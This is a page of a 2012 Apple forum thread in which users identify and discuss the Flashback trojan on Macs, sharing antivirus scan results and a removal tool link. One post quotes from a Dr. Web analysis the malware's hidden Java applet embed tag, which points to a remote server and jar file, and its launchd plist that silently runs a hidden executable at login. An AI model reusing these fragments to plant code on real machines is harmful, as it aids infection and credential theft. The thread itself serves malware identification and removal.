chadonline

Q: .rserv wants to connect to cuojshtbohnt.com

I have the message:

 

.rserv wants to connect to cuojshtbohnt.com

 

what is .rserv?  I googled it and couldn't locate anything ligitimate.

 

thanks

MacBook Pro, Mac OS X (10.6.8)

Posted on Mar 31, 2012 3:18 PM

Close

Q: .rserv wants to connect to cuojshtbohnt.com

  • All replies
  • Helpful answers

first Previous Page 13 of 16 last Next
  • by X423424X,

    X423424X X423424X Apr 6, 2012 2:34 PM in response to Marco g
    Level 6 (14,237 points)
    Apr 6, 2012 2:34 PM in response to Marco g

    Thank you for doing that.  Don't have time to look at it right now (on my way out) but I downloaded it to see what I can see later.

  • by Bob Mayo,

    Bob Mayo Bob Mayo Apr 6, 2012 5:05 PM in response to LysaM
    Level 1 (109 points)
    Mac OS X
    Apr 6, 2012 5:05 PM in response to LysaM

    Is .libgmalloc.dylib a legitimate file that is in some way corrupted by the malware, or is .libgmalloc.dylib itself bad?

    If it is a legitimate file that is corrupted by the malware, how does one restore a proper version of it?

     

    Thanks.

  • by fane_j,

    fane_j fane_j Apr 6, 2012 5:33 PM in response to Bob Mayo
    Level 4 (3,672 points)
    Apr 6, 2012 5:33 PM in response to Bob Mayo

    Bob Mayo wrote:

     

    Is .libgmalloc.dylib a legitimate file

    No.

     

    Basically, any shared code library whose name begins with a dot (.), which renders it invisible in Finder, is unlikely to be legitimate. Note that there are many shared code libraries on your Mac, and there are quite a few files whose names begin with dots (usually containing configuration or registration data). It's the combination of code and dot as first character that makes it highly suspicious and probably not legitimate.

  • by X423424X,

    X423424X X423424X Apr 6, 2012 5:43 PM in response to Bob Mayo
    Level 6 (14,237 points)
    Apr 6, 2012 5:43 PM in response to Bob Mayo

    (post deleted -- somehow didn't notice fane_j gave the answer I was going to give)

  • by WZZZ,

    WZZZ WZZZ Apr 6, 2012 6:01 PM in response to X423424X
    Level 6 (13,112 points)
    Mac OS X
    Apr 6, 2012 6:01 PM in response to X423424X

    Has anyone determined what mkeeper (MacKeeper) and com.zeobit (MacKeeper developer) are doing here? From Dr. Web on the BackDoor.Flashback.39 (This was brought up quickly earlier in this thread, but AFAIK never fully explored.)

     

    http://vms.drweb.com/virus/?i=1816029

     

    <object type="application/x-java-applet" width="0" height="0"> <param name="s" value="1"/> <param name="q" value="2"/> <param name="svname" value="com.zeobit.keep"> <param name="svbname" value="mkeeper"> <param name="dname" value="Software Update"> <param name="lurl" value="31.31.79.87">'); <param name="archive" value="al-2.jar"> <param name="code" value="a.apl"> </object>

    Эксплойт сохраняет на жесткий диск исполняемый файл и plist-файл отвечайющий за его запуск.

     

    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key><string>com.zeobit.keep</string>  <key>ProgramArguments</key><array><string>/Users/<username>/.mkeeper</string></array> <key>RunAtLoad</key><true/> <key>StartInterval</key><integer>4212</integer> <key>StandardErrorPath</key><string>/dev/null</string>  <key>StandardOutPath</key><string>/dev/null</string> </dict> </plist>

    После запуска троян осуществляет проверку на наличие компонент и при наличии хотябы одной из них прекращает свое выполнение:

  • by BoomerangJ111,

    BoomerangJ111 BoomerangJ111 Apr 6, 2012 6:02 PM in response to X423424X
    Level 1 (4 points)
    Desktops
    Apr 6, 2012 6:02 PM in response to X423424X

    Deleted-incorrect data

  • by Topher Kessler,

    Topher Kessler Topher Kessler Apr 6, 2012 6:14 PM in response to Bob Mayo
    Level 6 (9,866 points)
    Apr 6, 2012 6:14 PM in response to Bob Mayo

    It is not a legitimate file, and should be deleted. By default there is no file of that name or type in the Shared user directory.

  • by fane_j,

    fane_j fane_j Apr 6, 2012 6:20 PM in response to WZZZ
    Level 4 (3,672 points)
    Apr 6, 2012 6:20 PM in response to WZZZ

     

    WZZZ wrote:

     

    Has anyone determined what mkeeper (MacKeeper) and com.zeobit are doing here

    " value="com.zeobit.keep">

     

    I can't say for certain, but I fairly sure they've nothing to do with, just like Adobe didn't have anything to do with it. These are just ID strings (which could be any valid string) used by the malware's author to confuse and obfuscate. I suspect that the identifier actually used by MacKeeper is not "com.zeobit.keep" but something else. With the Adobe string the difference was just one character, "com.adobe.reader" instead of "com.adobe.Reader".

     

    Methinks this is the one instance where MacKeeper is not to blame.

  • by Topher Kessler,

    Topher Kessler Topher Kessler Apr 6, 2012 6:21 PM in response to WZZZ
    Level 6 (9,866 points)
    Apr 6, 2012 6:21 PM in response to WZZZ

    Malware has been known to hijack other application names, as we've seen with Flash in the past. MacKeeper hasn't been known to be malware, though the company behind it has pushed some questionable marketing practices and the product is not the best (it appears crudely coded in order to rake in revenue while providing minimal benefit). Many people recommend folks uninstall or avoid MacKeeper, and the presence of references to it in the latest threats do raise question, but so far it's not too conclusive.

  • by X423424X,

    X423424X X423424X Apr 6, 2012 6:29 PM in response to WZZZ
    Level 6 (14,237 points)
    Apr 6, 2012 6:29 PM in response to WZZZ

    WZZZ wrote:

     

    Has anyone determined what mkeeper (MacKeeper) and com.zeobit are doing here

     

    The second one looks identical to the one that started this thread only executing ~/.mkeeper instead of ~/.rserv.

     

    The first one I never saw before.  But there is a reference to a some java code called al-2.jar.

  • by MadMacs0,

    MadMacs0 MadMacs0 Apr 6, 2012 10:12 PM in response to Marco g
    Level 5 (4,791 points)
    Apr 6, 2012 10:12 PM in response to Marco g

    Marco g wrote:

     

    If anybody is interested, i renamed it to "flserv" uploaded

    Thanks for doing that. It's the first sample I've been able to collect with this variant.

     

    Readers will be happy to know the results of the following scans:

     

    ClamXav identified it as OSX.Flashback-8.

     

    Sophos Home Edition 8 identified it as OSX/Flshplyr-D .

     

    MacScan did not detect anything.

     

    12 of 42 A-V scanners detected it on virustotal.com and the link will take you to the results. Strangely enough it had not been previously uploaded. Positive identification was achieved by avast!, BitDefender, clamav, DrWeb, F-Secure, Kaspersky and Sophos, among others. Users are cautioned that "the service was not designed as a tool to perform antivirus comparative analyses, but as a tool that checks suspicious samples with several antivirus solutions and helps antivirus labs by forwarding them the malware they fail to detect."

  • by Matt Durben,

    Matt Durben Matt Durben Apr 6, 2012 11:20 PM in response to chadonline
    Level 1 (1 points)
    Apr 6, 2012 11:20 PM in response to chadonline

    Has anybody been able to detect, what this trojan exactly does? Either variant 1 for browsers or variant 2 systen/user installation? Some kind of keylogger or does it spy pw's that have been saved in ff/safari?

  • by MadMacs0,

    MadMacs0 MadMacs0 Apr 6, 2012 11:53 PM in response to Matt Durben
    Level 5 (4,791 points)
    Apr 6, 2012 11:53 PM in response to Matt Durben

    Matt Durben wrote:

     

    Has anybody been able to detect, what this trojan exactly does? Either variant 1 for browsers or variant 2 systen/user installation? Some kind of keylogger or does it spy pw's that have been saved in ff/safari?

    I'm certain both the Type 1 and Type 2 infections have the same goal, to use your network apps (browsers and Skype have been identified) to accomplish their goals. It has been observed to do re-directs to advertising sites, which I suppose could result in a small amount of compensation from the advertisers, but Intego believe there is a more lucrative goal which I just looked up earlier this evening in a February post Flashback Mac Trojan Horse Infections Increasing with New Variant where they say:

    This malware patches web browsers and network applications essentially to search for user names and passwords. It looks for a number of domains – websites such as Google, Yahoo!, CNN; bank websites; PayPal; and many others. Presumably, the people behind this malware are looking for both user names and passwords that they can immediately exploit – such as for a bank website – as well as others that may be reused on different sites. (Hint: don’t use the same password for all websites!)

    In a subsequent article they figured out that the results of this harvest are using Twitter to communicate back to the "Mother Ship" periodically using a specific hash tag for each date and deleting the messages after they get what they need. The message contains the unique identifier for that user and machine along with the username/password/website information.

  • by etresoft,

    etresoft etresoft Apr 7, 2012 9:37 AM in response to chadonline
    Level 7 (29,320 points)
    Mac OS X
    Apr 7, 2012 9:37 AM in response to chadonline

    I have created a user tip and malware checker/removal tool: https://discussions.apple.com/docs/DOC-3271

  • by dianeoforegon,

    dianeoforegon dianeoforegon Apr 7, 2012 4:22 PM in response to Topher Kessler
    Level 5 (5,741 points)
    Mac OS X
    Apr 7, 2012 4:22 PM in response to Topher Kessler

    For Office 2004 users that are infected we are seeing this in their crash logs:

     

    dyld: could not load inserted library: /User/Shared/.libgmalloc.dylib

first Previous Page 13 of 16 last Next